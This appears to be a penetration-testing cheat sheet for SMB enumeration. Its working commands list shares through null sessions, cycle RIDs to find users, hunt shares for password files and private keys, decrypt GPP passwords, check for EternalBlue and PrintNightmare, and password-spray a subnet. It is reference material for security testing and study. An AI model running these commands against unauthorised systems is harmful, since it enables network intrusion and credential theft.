SMB Enumeration
SMB (Server Message Block) on ports 139/445 is a goldmine for internal enumeration. Extract share permissions, user lists, password policies, and sensitive files.
Information
SMB enumeration often works with null sessions (no credentials) on older systems,
but authenticated enumeration yields significantly more information.
Share Enumeration
Null Session Enumeration
bash
# smbclient - list shares (null session)
smbclient -L //TARGET -N
# smbmap - null session
smbmap -H TARGET
# CrackMapExec - null session
crackmapexec smb TARGET -u '' -p '' --shares
# enum4linux-ng - comprehensive null session
enum4linux-ng -A TARGETAuthenticated Enumeration
bash
# smbclient with credentials
smbclient -L //TARGET -U 'domain/user%password'
# smbmap authenticated
smbmap -H TARGET -u user -p password
smbmap -H TARGET -u user -p password -d domain
# CrackMapExec authenticated
crackmapexec smb TARGET -u user -p password --shares
# enum4linux-ng authenticated
enum4linux-ng -u user -p password -A TARGETConnecting to Shares
bash
# Interactive connection
smbclient //TARGET/share -U 'user%password'
# Useful smbclient commands
smb: \> dir
smb: \> cd directory
smb: \> get filename
smb: \> mget *
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
# Mount share locally
sudo mount -t cifs //TARGET/share /mnt/share -o user=user,password=pass
sudo mount -t cifs //TARGET/share /mnt/share -o user=user,password=pass,domain=DOMAINDeep Share Enumeration
smbmap Deep Dive
bash
# Recursive listing (depth)
smbmap -H TARGET -u user -p pass -r share --depth 5
# Download files matching pattern
smbmap -H TARGET -u user -p pass -R -A '\.(config|xml|txt|ini|bak)$'
# Search for specific filename patterns
smbmap -H TARGET -u user -p pass -R -A 'password|credential|secret'
# List all readable files recursively
smbmap -H TARGET -u user -p pass -RCrackMapExec Spider
bash
# Spider shares for files
crackmapexec smb TARGET -u user -p pass -M spider_plus
# Spider with specific patterns
crackmapexec smb TARGET -u user -p pass -M spider_plus -o EXCLUDE_DIR=Windows,ProgramData
# Output to JSON for analysis
crackmapexec smb TARGET -u user -p pass -M spider_plus -o OUTPUT=/tmp/spider.jsonUser & Group Enumeration
enum4linux-ng
bash
# Full enumeration
enum4linux-ng -A TARGET
# Users only
enum4linux-ng -U TARGET
# Groups only
enum4linux-ng -G TARGET
# Shares only
enum4linux-ng -S TARGET
# Password policy
enum4linux-ng -P TARGET
# RID cycling (enumerate users via RID brute force)
enum4linux-ng -R TARGETrpcclient
bash
# Connect with credentials
rpcclient -U 'user%password' TARGET
# Null session
rpcclient -U '' -N TARGET
# Interactive commands
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> queryuser 500
rpcclient $> queryuser administrator
rpcclient $> querygroupmem "Domain Admins"
rpcclient $> getdompwinfo
rpcclient $> lsaenumsid
rpcclient $> lookupnames administratorImpacket Tools
bash
# samrdump - dump SAM info
samrdump.py domain/user:password@TARGET
# lookupsid - enumerate users via SID
lookupsid.py domain/user:password@TARGET
# Brute force RIDs
lookupsid.py domain/user:password@TARGET 20000Sensitive File Hunting
High-Value Targets
text
# Files to look for:
web.config # ASP.NET config with connection strings
*.config # Various app configs
unattend.xml # Windows deployment answers
sysprep.xml # Sysprep answers (may contain creds)
Groups.xml # GPP passwords (SYSVOL)
*.kdbx # KeePass databases
*.key, *.pem # SSH/SSL keys
id_rsa # SSH private keys
.git/ # Git repositories
.svn/ # SVN repositories
*.bak, *.old # Backup files
passwords.txt # Self-explanatory
credentials.xml # Jenkins credentials
*.sql # Database dumps
*.mdb, *.accdb # Access databasesGPP Password Extraction
bash
# Check SYSVOL for Groups.xml (GPP passwords)
smbclient //DC/SYSVOL -U 'user%pass' -c 'recurse;ls' | grep -i groups.xml
# Download and decrypt
smbmap -H DC -u user -p pass -R SYSVOL -A Groups.xml
# Decrypt GPP password
gpp-decrypt "encrypted_password_here"
# Automated with CrackMapExec
crackmapexec smb DC -u user -p pass -M gpp_passwordSMB Vulnerabilities
SMB Signing Check
bash
# Check SMB signing (required for relay attacks)
crackmapexec smb TARGET --gen-relay-list relay.txt
# Nmap script
nmap -p 445 --script smb-security-mode TARGET
# Output shows:
# message_signing: disabled (vulnerable to relay)
# message_signing: required (not vulnerable)EternalBlue (MS17-010)
bash
# Check for MS17-010
nmap -p 445 --script smb-vuln-ms17-010 TARGET
# CrackMapExec check
crackmapexec smb TARGET -u '' -p '' -M ms17-010PrintNightmare Check
bash
# Check if Print Spooler is running
rpcdump.py TARGET | grep -i spooler
# CrackMapExec module
crackmapexec smb TARGET -u user -p pass -M printnightmareMass SMB Enumeration
bash
# Enumerate entire subnet
crackmapexec smb 10.10.10.0/24 -u user -p pass --shares
# Find writable shares
crackmapexec smb 10.10.10.0/24 -u user -p pass --shares | grep -i write
# Password spray across SMB
crackmapexec smb targets.txt -u users.txt -p 'Password123!' --continue-on-success
# Export results
crackmapexec smb 10.10.10.0/24 -u user -p pass --shares --export shares.jsonQuick Reference
| Task | Tool | Command |
|---|---|---|
| List shares | smbmap | smbmap -H TARGET -u user -p pass |
| Full enum | enum4linux-ng | enum4linux-ng -A TARGET |
| Spider files | CME | cme smb TARGET -M spider_plus |
| GPP passwords | CME | cme smb DC -M gpp_password |
| Signing check | CME | cme smb TARGET --gen-relay-list |